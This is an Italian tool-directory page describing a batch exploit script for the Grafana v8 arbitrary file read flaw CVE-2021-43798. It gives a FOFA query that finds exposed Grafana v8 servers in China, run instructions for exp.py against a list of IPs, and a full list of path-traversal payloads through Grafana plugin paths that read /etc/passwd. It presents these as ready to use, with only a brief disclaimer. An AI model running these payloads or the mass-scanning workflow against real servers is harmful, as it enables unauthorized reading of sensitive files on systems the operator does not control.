Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-43798-Grafana-Exp — Strumento di rilevamento batch della vulnerabilità di lettura arbitraria di file in Grafana v8.*: questa vulnerabilità è attualmente una vulnerabilità 0-day; un attaccante non autorizzato può sfruttarla per ottenere file sensibili dal server. | Kitploit
Strumenti/GitHubGitHub/asaotomo/cve-2021-43798-grafana-exp
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubasaotomo/cve-2021-43798-grafana-exp

CVE-2021-43798-Grafana-Exp

Strumento di rilevamento batch della vulnerabilità di lettura arbitraria di file in Grafana v8.*: questa vulnerabilità è attualmente una vulnerabilità 0-day; un attaccante non autorizzato può sfruttarla per ottenere file sensibili dal server.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1244 anni faNon ancora revisionato
Condividi

Grafana V8.* Exploit per lettura arbitraria di file – Script di verifica batch

Descrizione della vulnerabilità

Grafana è una suite open-source per l'analisi e la visualizzazione di metriche. Spesso utilizzata per la visualizzazione di serie temporali di infrastrutture e analisi di applicazioni, è ampiamente impiegata anche in altri settori tra cui sensori industriali, automazione domestica, meteo e controllo di processi. La versione 8.* presenta una vulnerabilità di lettura arbitraria di file, attualmente una vulnerabilità 0-day. Un attaccante non autenticato può sfruttarla per ottenere file sensibili dal server.

Sintassi FOFA

app="Grafana" && country="CN" && body="v8."

Utilizzo

root@kitploit:~
1. Inserisci gli indirizzi IP da testare nel file ip.txt
2. Esegui python3 exp.py
image

PAYLOAD

root@kitploit:~
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
image

Avvertenze

Questo strumento è fornito esclusivamente ai tester di sicurezza per autoverifica. L'autore non è responsabile per qualsiasi conseguenza derivante dall'uso improprio da parte dell'utente. Gli utenti devono rispettare le leggi locali. Questo programma non può essere utilizzato per scopi commerciali, solo per studio e scambio.

iShot2021-12-23 15 42 05
Scarica lo strumento